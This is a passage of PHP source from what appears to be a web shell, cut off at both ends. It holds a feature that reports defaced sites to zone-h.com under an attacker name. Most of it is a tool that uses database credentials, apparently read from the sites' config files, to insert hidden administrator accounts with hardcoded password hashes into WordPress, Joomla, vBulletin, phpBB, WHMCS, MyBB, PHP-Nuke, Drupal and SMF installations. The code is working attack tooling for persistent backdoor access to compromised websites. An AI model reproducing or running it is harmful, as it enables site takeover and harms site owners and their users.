<textarea name=”domain” cols=”90″ rows=”20″ placeholder=”Domains…”></textarea><br>
<p><input type=”submit” value=” ” name=”go” /></p>
</form></center>’;
if($_POST['alfa5'] && $_POST['alfa5'] == ‘>>’){
ob_start();
$hacker = $_POST['alfa1'];
$method = $_POST['alfa2'];
$neden = $_POST['alfa3'];
$site = $_POST['alfa4'];
if(empty($hacker)){
die (__pre().”<center><b><font color =\”#FF0000\”>[+] YOU MUST FILL THE ATTACKER NAME [+]</font></b></center>”);
}elseif($method == “————————————SELECT————————————-”){
die(__pre().”<center><b><font color =\”#FF0000\”>[+] YOU MUST SELECT THE METHOD [+]</b></font></center>”);
}elseif($neden == “————————————SELECT————————————-”){
die(__pre().”<center><b><font color =\”#FF0000\”>[+] YOU MUST SELECT THE REASON [+]</b></font></center>”);
}elseif(empty($site)){
die(__pre().”<center><b><font color =\”#FF0000\”>[+] YOU MUST INTER THE SITES LIST [+]<font></b></center>”);
}
$i = 0;
$sites = explode(“\n”, $site);
$alfa = new AlfaCURL();
while($i < count($sites)){
if(substr($sites[$i], 0, 4) != “http”){
$sites[$i] = “http://”.$sites[$i];
}
$alfa->Send(“http://www.zone-h.com/notify/single”,”post”,”defacer=”.$hacker.”&domain1=”. $sites[$i].”&hackmode=”.$method.”&reason=”.$neden);
++$i;
}
echo __pre().”<center><font color =\”#00A220\”><b>[+] Sending Sites To Zone-H Has Been Completed Successfully !!![+]</b><font></center>”;
}
echo “</div>”;
alfafooter();
}
function alfapwchanger(){
alfahead();

echo ‘<div class=header><center><br><div class=”txtfont_header”>| Add New Admin |</div>
<center><h3>’;
$vals = array(‘WordPress’ => array(‘wp’,2),’Joomla’ => array(‘joomla’,3),’vBulletin’ => array(‘vb’,5),’phpBB’ => array(‘phpbb’,6),’WHMCS’ => array(‘whmcs’,7),’MyBB’ => array(‘mybb’,8),’Php Nuke’ => array(‘nuke’,9),’Drupal’ => array(‘drupal’,10),’SMF’ => array(‘smf’,11));
Alfa_Create_A_Tag(‘pwchanger’,$vals);
echo ‘</h3></center>’;
if(isset($_POST['alfa1'])&&$_POST['alfa1']==’wp’){

echo __pre().’<center><center><div class=”txtfont_header”>| WordPress |</div>
<p>’.getConfigHtml(‘wp’).’</p><form onSubmit=”g(\’pwchanger\’,null,\’wp\’,\’>>\’,this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;” method=”POST”>’;
$table = array(‘td1′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Mysql Host’,’id’=>’db_host’, ‘inputName’ => ‘localhost’, ‘inputValue’ => ‘localhost’, ‘inputSize’ => ’50′),
‘td2′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Db Name’, ‘id’=>’db_name’,’inputName’ => ‘database’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td3′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Db User’, ‘id’=>’db_user’,’inputName’ => ‘username’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td4′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Db Pass’, ‘id’=>’db_pw’,’inputName’ => ‘password’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td5′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Table Prefix’, ‘id’=>’db_prefix’,’inputName’ => ‘prefix’, ‘inputValue’ => ‘wp_’, ‘inputSize’ => ’50′),
‘td6′ =>
array(‘color’ => ‘FF0000′, ‘tdName’ => ‘Admin User’, ‘inputName’ => ‘admin’, ‘inputValue’ => ‘admin’, ‘inputSize’ => ’50′),
‘td7′ =>
array(‘color’ => ‘FF0000′, ‘tdName’ => ‘Admin Pass’, ‘inputName’ => ‘kh’, ‘inputValue’ => ‘solevisible’, ‘inputSize’ => ’50′, ‘disabled’ => true),
‘td8′ =>
array(‘color’ => ‘FF0000′, ‘tdName’ => ‘Admin Email’, ‘inputName’ => ‘email’, ‘inputValue’ => ‘solevisible@fbi.gov’, ‘inputSize’ => ’50′)
);
create_table($table);
echo ‘<p><input value=” ” name=”send” type=”submit”></p></form>’;
if ($_POST['alfa2'] && $_POST['alfa2'] == ‘>>’){
$localhost = $_POST['alfa3'];
$database = $_POST['alfa4'];
$username = $_POST['alfa5'];
$password = $_POST['alfa6'];
$admin = $_POST['alfa8'];
$SQL = $_POST['alfa9'];
$prefix = $_POST['alfa10'];
$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,”insert into “.$prefix.”users (ID,user_login,user_pass,user_email) values(null,’$admin’,’d4a590caacc0be55ef286e40a945ea45′,’$SQL’)”) or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,”select ID from “.$prefix.”users where user_login=’”.$admin.”‘”) or die(mysqli_error($conn));
$sole = @mysqli_num_rows($solevisible);
if ($sole == 1){
$solevis = @mysqli_fetch_assoc($solevisible);
$res = $solevis['ID'];
}
$solevisible=@mysqli_query($conn,”insert into “.$prefix.”usermeta (umeta_id,user_id,meta_key,meta_value) values(null,’”.$res.”‘,’first_name’,’solevisible’),(null,’”.$res.”‘,’last_name’,’solevisible’),(null,’”.$res.”‘,’nickname’,’solevisible’),(null,’”.$res.”‘,’description’,’solevisible’),(null,’”.$res.”‘,’rich_editing’,’true’),(null,’”.$res.”‘,’comment_shortcuts’,’false’),(null,’”.$res.”‘,’admin_color’,’fresh’),(null,’”.$res.”‘,’use_ssl’,’0′),(null,’”.$res.”‘,’show_admin_bar_front’,’true’),(null,’”.$res.”‘,’”.$prefix.”capabilities’,’a:1:{s:13:\”administrator\”;b:1;}’),(null,’”.$res.”‘,’”.$prefix.”user_level’,’10′),(null,’”.$res.”‘,’show_welcome_panel’,’1′),(null,’”.$res.”‘,’”.$prefix.”dashboard_quick_press_last_post_id’,’3′)”) or die(mysqli_error($conn));
if($solevisible){
__alert(‘Success… ‘.$admin.’ is created…’);}
}
}
if($_POST['alfa2'] && $_POST['alfa2'] == ‘joomla’){

echo __pre().’<center><center><div class=”txtfont_header”>| Joomla |</div><p><p>’.getConfigHtml(‘joomla’).’</p><form onSubmit=”g(\’pwchanger\’,null,\’>>\’,\’joomla\’,this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;” method=”POST”>’;
$table = array(‘td1′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Mysql Host’, ‘id’=>’db_host’,’inputName’ => ‘localhost’, ‘inputValue’ => ‘localhost’, ‘inputSize’ => ’50′),
‘td2′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Db Name’, ‘id’=>’db_name’,’inputName’ => ‘database’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td3′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Db User’, ‘id’=>’db_user’,’inputName’ => ‘username’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td4′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Db Pass’, ‘id’=>’db_pw’,’inputName’ => ‘password’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td5′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Table Prefix’, ‘id’=>’db_prefix’,’inputName’ => ‘prefix’, ‘inputValue’ => ‘jos_’, ‘inputSize’ => ’50′),
‘td6′ =>
array(‘color’ => ‘FF0000′, ‘tdName’ => ‘Admin User’, ‘inputName’ => ‘admin’, ‘inputValue’ => ‘admin’, ‘inputSize’ => ’50′),
‘td7′ =>
array(‘color’ => ‘FF0000′, ‘tdName’ => ‘Admin Pass’, ‘inputName’ => ‘toftof’, ‘inputValue’ => ‘solevisible’, ‘inputSize’ => ’50′, ‘disabled’ => true),
‘td8′ =>
array(‘color’ => ‘FF0000′, ‘tdName’ => ‘Admin Email’, ‘inputName’ => ‘email’, ‘inputValue’ => ‘solevisible@fbi.gov’, ‘inputSize’ => ’50′)
);
create_table($table);
echo ‘<p><input value=” ” name=”send” type=”submit”></p></form></center>’;
if ($_POST['alfa1'] && $_POST['alfa1'] == ‘>>’){
$localhost = $_POST['alfa3'];
$database = $_POST['alfa4'];
$username = $_POST['alfa5'];
$password = $_POST['alfa6'];
$admin = $_POST['alfa8'];
$SQL = $_POST['alfa9'];
$prefix = $_POST['alfa10'];
$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,”insert into “.$prefix.”users (id,name,username,email,password) values(null,’Super User’,’”.$admin.”‘,’”.$SQL.”‘,’d4a590caacc0be55ef286e40a945ea45′)”) or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,”select id from “.$prefix.”users where username=’”.$admin.”‘”) or die(mysqli_error($conn));
$sole =@mysqli_num_rows($solevisible);
if ($sole == 1){
$solevis =@mysqli_fetch_assoc($solevisible);
$res = $solevis['id'];
}
$solevisible=@mysqli_query($conn,”INSERT INTO “.$prefix.”user_usergroup_map (user_id,group_id) VALUES (‘”.$res.”‘, ’8′)”) or die(mysqli_error($conn));
if($solevisible){
__alert(‘Success… ‘.$admin.’ is created…’);}
}
}
if($_POST['alfa4'] && $_POST['alfa4'] == ‘vb’){

echo __pre().’<center><center><div class=”txtfont_header”>| vBulletin |<div><p>’.getConfigHtml(‘vb’).’</p><form onSubmit=”g(\’pwchanger\’,null,\’>>\’,this.localhost.value,this.database.value,\’vb\’,this.username.value,this.password.value,this.prefix.value,this.admin.value,this.email.value); return false;” method=”POST”>’;
$table = array(‘td1′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Mysql Host’, ‘id’=>’db_host’,’inputName’ => ‘localhost’, ‘inputValue’ => ‘localhost’, ‘inputSize’ => ’50′),
‘td2′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Db Name’, ‘id’=>’db_name’,’inputName’ => ‘database’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td3′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Db User’, ‘id’=>’db_user’,’inputName’ => ‘username’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td4′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Db Pass’, ‘id’=>’db_pw’,’inputName’ => ‘password’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td5′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Table Prefix’, ‘id’=>’db_prefix’,’inputName’ => ‘prefix’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td6′ =>
array(‘color’ => ‘FF0000′, ‘tdName’ => ‘Admin User’, ‘inputName’ => ‘admin’, ‘inputValue’ => ‘admin’, ‘inputSize’ => ’50′),
‘td7′ =>
array(‘color’ => ‘FF0000′, ‘tdName’ => ‘Admin Pass’, ‘inputName’ => ‘hi’, ‘inputValue’ => ‘solevisible’, ‘inputSize’ => ’50′, ‘disabled’ => true),
‘td8′ =>
array(‘color’ => ‘FF0000′, ‘tdName’ => ‘Admin Email’, ‘inputName’ => ‘email’, ‘inputValue’ => ‘solevisible@fbi.gov’, ‘inputSize’ => ’50′)
);
create_table($table);
echo ‘<p><input value=” ” name=”send” type=”submit”></p></form></center>’;
if($_POST['alfa1'] && $_POST['alfa1'] == ‘>>’){
$localhost = $_POST['alfa2'];
$database = $_POST['alfa3'];
$username = $_POST['alfa5'];
$password = $_POST['alfa6'];
$prefix = $_POST['alfa7'];
$admin = $_POST['alfa8'];
$SQL = $_POST['alfa9'];
$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,”insert into {$prefix}user (userid,usergroupid,username,password,salt,email,passworddate,joindate) values(null,’6′,’$admin’,’52e28b78f55641cd4618ad1a20f5fd5c’,’Xw|IbGLhTQA-AwApVv>61y^(z]*<QN’,’$SQL’,’”.date(‘Y-m-d’).”‘,’”.time().”‘)”) or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,”select userid from {$prefix}user where username=’”.$admin.”‘”) or die(mysqli_error($conn));
$sole = mysqli_num_rows($solevisible);
if($sole == 1){
$solevis = mysqli_fetch_assoc($solevisible);
$res = $solevis['userid'];
}
$solevisible=@mysqli_query($conn,”insert into {$prefix}administrator (userid,adminpermissions) values(‘”.$res.”‘,’16744444′)”) or die(mysqli_error($conn));
if($solevisible){
__alert(‘Success… ‘.$admin.’ is created…’);}
}
}
if(isset($_POST['alfa5']) && $_POST['alfa5'] == ‘phpbb’){

echo __pre().’<center><div class=”txtfont_header”>| phpBB |</div><p><p>’.getConfigHtml(‘phpbb’).’</p><form onSubmit=”g(\’pwchanger\’,null,\’>>\’,this.localhost.value,this.database.value,this.username.value,\’phpbb\’,this.password.value,null,this.admin.value,this.email.value,this.prefix.value); return false;” method=”POST”>’;
$table = array(‘td1′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Mysql Host’, ‘id’=>’db_host’,’inputName’ => ‘localhost’, ‘inputValue’ => ‘localhost’, ‘inputSize’ => ’50′),
‘td2′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Db Name’, ‘id’=>’db_name’,’inputName’ => ‘database’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td3′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Db User’, ‘id’=>’db_user’,’inputName’ => ‘username’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td4′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Db Pass’, ‘id’=>’db_pw’,’inputName’ => ‘password’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td5′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Table Prefix’, ‘id’=>’db_prefix’,’inputName’ => ‘prefix’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td6′ =>
array(‘color’ => ‘FF0000′, ‘tdName’ => ‘Admin User’, ‘inputName’ => ‘admin’, ‘inputValue’ => ‘admin’, ‘inputSize’ => ’50′),
‘td7′ =>
array(‘color’ => ‘FF0000′, ‘tdName’ => ‘Admin Pass’, ‘inputName’ => ‘toftof’, ‘inputValue’ => ‘solevisible’, ‘inputSize’ => ’50′, ‘disabled’ => true),
‘td8′ =>
array(‘color’ => ‘FF0000′, ‘tdName’ => ‘Admin Email’, ‘inputName’ => ‘email’, ‘inputValue’ => ‘solevisible@fbi.gov’, ‘inputSize’ => ’50′)
);
create_table($table);
echo ‘<p><input value=” ” name=”send” type=”submit”></p></form></center>’;
if ($_POST['alfa1'] && $_POST['alfa1'] == ‘>>’){
$localhost = $_POST['alfa2'];
$database = $_POST['alfa3'];
$username = $_POST['alfa4'];
$password = $_POST['alfa6'];
$admin = $_POST['alfa8'];
$SQL = $_POST['alfa9'];
$prefix = $_POST['alfa10'];
$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
$hash = md5(‘solevisible’);
$solevisible=@mysqli_query($conn,”UPDATE “.$prefix.”users SET username_clean =’”.$admin.”‘ WHERE username_clean = ‘admin’”) or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,”UPDATE “.$prefix.”users SET user_password =’”.$hash.”‘ WHERE username_clean = ‘admin’”) or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,”UPDATE “.$prefix.”users SET username_clean =’”.$admin.”‘ WHERE user_type = 3″) or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,”UPDATE “.$prefix.”users SET user_password =’”.$hash.”‘ WHERE user_type = 3″) or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,”UPDATE “.$prefix.”users SET user_email =’”.$SQL.”‘ WHERE username_clean = ‘admin’”) or die(mysqli_error($conn));
if($solevisible){
__alert(‘Success… ‘.$admin.’ is created…’);
}
}
}
if(isset($_POST['alfa6']) && $_POST['alfa6'] == ‘whmcs’){

echo __pre().’<center><div class=”txtfont_header”>| Whmcs |</div><p><p>’.getConfigHtml(‘whmcs’).’</p><form onSubmit=”g(\’pwchanger\’,null,\’>>\’,this.localhost.value,this.database.value,this.username.value,this.password.value,\’whmcs\’,null,this.admin.value,this.email.value); return false;” method=”POST”>’;
$table = array(‘td1′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Mysql Host’, ‘id’=>’db_host’,’inputName’ => ‘localhost’, ‘inputValue’ => ‘localhost’, ‘inputSize’ => ’50′),
‘td2′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Db Name’, ‘id’=>’db_name’,’inputName’ => ‘database’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td3′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Db User’, ‘id’=>’db_user’,’inputName’ => ‘username’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td4′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Db Pass’, ‘id’=>’db_pw’,’inputName’ => ‘password’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td6′ =>
array(‘color’ => ‘FF0000′, ‘tdName’ => ‘Admin User’, ‘inputName’ => ‘admin’, ‘inputValue’ => ‘admin’, ‘inputSize’ => ’50′),
‘td7′ =>
array(‘color’ => ‘FF0000′, ‘tdName’ => ‘Admin Pass’, ‘inputName’ => ‘toftof’, ‘inputValue’ => ‘solevisible’, ‘inputSize’ => ’50′, ‘disabled’ => true),
‘td8′ =>
array(‘color’ => ‘FF0000′, ‘tdName’ => ‘Admin Email’, ‘inputName’ => ‘email’, ‘inputValue’ => ‘solevisible@fbi.gov’, ‘inputSize’ => ’50′)
);
create_table($table);
echo ‘<p><input value=” ” name=”send” type=”submit”></p></form></center>’;
if ($_POST['alfa1'] && $_POST['alfa1'] == ‘>>’){
$localhost = $_POST['alfa2'];
$database = $_POST['alfa3'];
$username = $_POST['alfa4'];
$password = $_POST['alfa5'];
$admin = $_POST['alfa8'];
$SQL = $_POST['alfa9'];
$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,”insert into tbladmins (id,roleid,username,password,email,template,homewidgets) values(null,’1′,’”.$admin.”‘,’d4a590caacc0be55ef286e40a945ea45′,’”.$SQL.”‘,’blend’,’getting_started:true,orders_overview:true,supporttickets_overview:true,my_notes:true,client_activity:true,open_invoices:true,activity_log:true|income_overview:true,system_overview:true,whmcs_news:true,sysinfo:true,admin_activity:true,todo_list:true,network_status:true,income_forecast:true|’)”) or die(mysqli_error($conn));
if($solevisible){
__alert(‘Success… ‘.$admin.’ is created…’);}
}
}
if(isset($_POST['alfa7']) && $_POST['alfa7'] == ‘mybb’){

echo __pre().’<center><div class=”txtfont_header”>| Mybb |</div><p><p>’.getConfigHtml(‘mybb’).’</p><form onsubmit=”g(\’pwchanger\’,null,\’>>\’,this.localhost.value,this.database.value,this.username.value,this.password.value,null,\’mybb\’,this.admin.value,this.email.value,this.prefix.value); return false;” method=”POST”>’;
$table = array(‘td1′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Mysql Host’, ‘id’=>’db_host’,’inputName’ => ‘localhost’, ‘inputValue’ => ‘localhost’, ‘inputSize’ => ’50′),
‘td2′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Db Name’, ‘id’=>’db_name’,’inputName’ => ‘database’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td3′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Db User’, ‘id’=>’db_user’,’inputName’ => ‘username’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td4′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Db Pass’, ‘id’=>’db_pw’,’inputName’ => ‘password’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td5′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Table Prefix’, ‘id’=>’db_prefix’,’inputName’ => ‘prefix’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td6′ =>
array(‘color’ => ‘FF0000′, ‘tdName’ => ‘Admin User’, ‘inputName’ => ‘admin’, ‘inputValue’ => ‘admin’, ‘inputSize’ => ’50′),
‘td7′ =>
array(‘color’ => ‘FF0000′, ‘tdName’ => ‘Admin Pass’, ‘inputName’ => ‘toftof’, ‘inputValue’ => ‘solevisible’, ‘inputSize’ => ’50′, ‘disabled’ => true),
‘td8′ =>
array(‘color’ => ‘FF0000′, ‘tdName’ => ‘Admin Email’, ‘inputName’ => ‘email’, ‘inputValue’ => ‘solevisible@fbi.gov’, ‘inputSize’ => ’50′)
);
create_table($table);
echo ‘<p><input value=” ” name=”send” type=”submit”></p></form></center>’;
if ($_POST['alfa1'] && $_POST['alfa1'] == ‘>>’){
$localhost = $_POST['alfa2'];
$database = $_POST['alfa3'];
$username = $_POST['alfa4'];
$password = $_POST['alfa5'];
$admin = $_POST['alfa8'];
$SQL = $_POST['alfa9'];
$prefix = $_POST['alfa10'];
$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,”insert into “.$prefix.”users (uid,username,password,salt,email,usergroup) values(null,’”.$admin.”‘,’e71f2c3265619038d826a1ac6e2b9b8e’,’ywza68lS’,’”.$SQL.”‘,’4′)”) or die(mysqli_error($conn));
if($solevisible){
__alert(‘Success… ‘.$admin.’ is created…’);}
}
}
if(isset($_POST['alfa8']) && $_POST['alfa8'] == ‘nuke’){

echo __pre().’<center><div class=”txtfont_header”>| PhpNuke |</div><p><p>’.getConfigHtml(‘phpnuke’).’</p><form onsubmit=”g(\’pwchanger\’,null,\’>>\’,this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,\’nuke\’,this.email.value,this.prefix.value); return false;” method=”POST”>’;
$table = array(‘td1′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Mysql Host’, ‘id’=>’db_host’,’inputName’ => ‘localhost’, ‘inputValue’ => ‘localhost’, ‘inputSize’ => ’50′),
‘td2′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Db Name’, ‘id’=>’db_name’,’inputName’ => ‘database’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td3′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Db User’, ‘id’=>’db_user’,’inputName’ => ‘username’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td4′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Db Pass’, ‘id’=>’db_pw’,’inputName’ => ‘password’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td5′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Table Prefix’, ‘id’=>’db_prefix’,’inputName’ => ‘prefix’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td6′ =>
array(‘color’ => ‘FF0000′, ‘tdName’ => ‘Admin User’, ‘inputName’ => ‘admin’, ‘inputValue’ => ‘admin’, ‘inputSize’ => ’50′),
‘td7′ =>
array(‘color’ => ‘FF0000′, ‘tdName’ => ‘Admin Pass’, ‘inputName’ => ‘toftof’, ‘inputValue’ => ‘solevisible’, ‘inputSize’ => ’50′, ‘disabled’ => true),
‘td8′ =>
array(‘color’ => ‘FF0000′, ‘tdName’ => ‘Admin Email’, ‘inputName’ => ‘email’, ‘inputValue’ => ‘solevisible@fbi.gov’, ‘inputSize’ => ’50′)
);
create_table($table);
echo ‘<p><input value=” ” name=”send” type=”submit”></p></form></center>’;
if ($_POST['alfa1'] && $_POST['alfa1'] == ‘>>’){
$localhost = $_POST['alfa2'];
$database = $_POST['alfa3'];
$username = $_POST['alfa4'];
$password = $_POST['alfa5'];
$admin = $_POST['alfa7'];
$SQL = $_POST['alfa9'];
$prefix = $_POST['alfa10'];
$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
$hash = md5($pwd);
$solevisible=@mysqli_query($conn,”insert into “.$prefix.”_authors(aid,name,email,pwd) values(‘$admin’,’God’,’$SQL’,’d4a590caacc0be55ef286e40a945ea45′)”) or die(mysqli_error($conn));
if($solevisible){
__alert(‘Success… ‘.$admin.’ is created…’);}
}
}
if(isset($_POST['alfa9']) && $_POST['alfa9'] == ‘drupal’){

echo __pre().’<center><div class=”txtfont_header”>| Drupal |</div><p><p>’.getConfigHtml(‘drupal’).’</p><form onSubmit=”g(\’pwchanger\’,null,\’>>\’,this.localhost.value,null,this.database.value,this.username.value,this.password.value,null,this.admin.value,\’drupal\’); return false;” method=”POST”>’;
$table = array(‘td1′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Mysql Host’, ‘id’=>’db_host’,’inputName’ => ‘localhost’, ‘inputValue’ => ‘localhost’, ‘inputSize’ => ’50′),
‘td2′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Db Name’, ‘id’=>’db_name’,’inputName’ => ‘database’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td3′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Db User’, ‘id’=>’db_user’,’inputName’ => ‘username’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td4′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Db Pass’, ‘id’=>’db_pw’,’inputName’ => ‘password’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td6′ =>
array(‘color’ => ‘FF0000′, ‘tdName’ => ‘Admin User’, ‘inputName’ => ‘admin’, ‘inputValue’ => ‘admin’, ‘inputSize’ => ’50′),
‘td7′ =>
array(‘color’ => ‘FF0000′, ‘tdName’ => ‘Admin Pass’, ‘inputName’ => ‘toftof’, ‘inputValue’ => ‘solevisible’, ‘inputSize’ => ’50′, ‘disabled’ => true)
);
create_table($table);
echo ‘<p><input value=” ” name=”send” type=”submit”></p></form></center>’;
if ($_POST['alfa1'] && $_POST['alfa1'] == ‘>>’){
$localhost = $_POST['alfa2'];
$database = $_POST['alfa4'];
$username = $_POST['alfa5'];
$password = $_POST['alfa6'];
$admin = $_POST['alfa8'];
$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
$getDescuid = @mysqli_query($conn,”select uid from users order by uid desc limit 0,1″);
$getDescuid = @mysqli_fetch_assoc($getDescuid);
$getDescuid = $getDescuid['uid'];
$getdescuid = $getDescuid++;
$solevisible=@mysqli_query($conn,”insert into users (uid,name,pass,mail,signature_format,status,timezone,init) values(‘$getDescuid’,’$admin’,’\$S\$DP2y9AbolCBOd\/WyQcpzu4zF57qE0noyCNeXZWv.37R66VsFjOiC’,’solevisible@fbi.gov’,’filtered_html’,’1′,’Europe/Berlin’,’solevisible@fbi.gov’)”) or die(mysqli_error($conn));
$solevisible=@mysqli_query($conn,”select uid from users where name=’”.$admin.”‘”) or die(mysqli_error($conn));
$sole = mysqli_num_rows($solevisible);
if ($sole == 1){
$solevis = mysqli_fetch_assoc($solevisible);
$res = $solevis['uid'];
}
$solevisible=@mysqli_query($conn,”INSERT INTO users_roles (uid,rid) VALUES (‘”.$res.”‘, ’3′)”) or die(mysqli_error($conn));
if($solevisible){
__alert(‘Success… ‘.$admin.’ is created…’);}
}
}

if(isset($_POST['alfa10']) && $_POST['alfa10'] == ‘smf’){

echo __pre().’<center><center><div class=”txtfont_header”>| SMF |</div><p><p>’.getConfigHtml(‘smf’).’</p><form onSubmit=”g(\’pwchanger\’,null,\’>>\’,this.localhost.value,this.database.value,null,this.username.value,this.password.value,this.prefix.value,this.admin.value,null,\’smf\’); return false;” method=”POST”>’;
$table = array(‘td1′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Mysql Host’, ‘id’=>’db_host’,’inputName’ => ‘localhost’, ‘inputValue’ => ‘localhost’, ‘inputSize’ => ’50′),
‘td2′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Db Name’, ‘id’=>’db_name’,’inputName’ => ‘database’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td3′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Db User’, ‘id’=>’db_user’,’inputName’ => ‘username’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td4′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Db Pass’, ‘id’=>’db_pw’,’inputName’ => ‘password’, ‘inputValue’ => ”, ‘inputSize’ => ’50′),
‘td5′ =>
array(‘color’ => ‘FFFFFF’, ‘tdName’ => ‘Table Prefix’, ‘id’=>’db_prefix’,’inputName’ => ‘prefix’, ‘inputValue’ => ‘smf_’, ‘inputSize’ => ’50′),
‘td6′ =>
array(‘color’ => ‘FF0000′, ‘tdName’ => ‘Admin User’, ‘inputName’ => ‘admin’, ‘inputValue’ => ‘admin’, ‘inputSize’ => ’50′),
‘td7′ =>
array(‘color’ => ‘FF0000′, ‘tdName’ => ‘Admin Pass’, ‘inputName’ => ‘hi’, ‘inputValue’ => ‘solevisible’, ‘inputSize’ => ’50′, ‘disabled’ => true),
);
create_table($table);
echo ‘<p><input value=” ” name=”send” type=”submit”></p></form></center>’;
if ($_POST['alfa1'] && $_POST['alfa1'] == ‘>>’){
$localhost = $_POST['alfa2'];
$database = $_POST['alfa3'];
$username = $_POST['alfa5'];
$password = $_POST['alfa6'];
$prefix = $_POST['alfa7'];
$admin = $_POST['alfa8'];
$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
$setpwAlg = sha1(strtolower($admin) . ‘solevisible’);
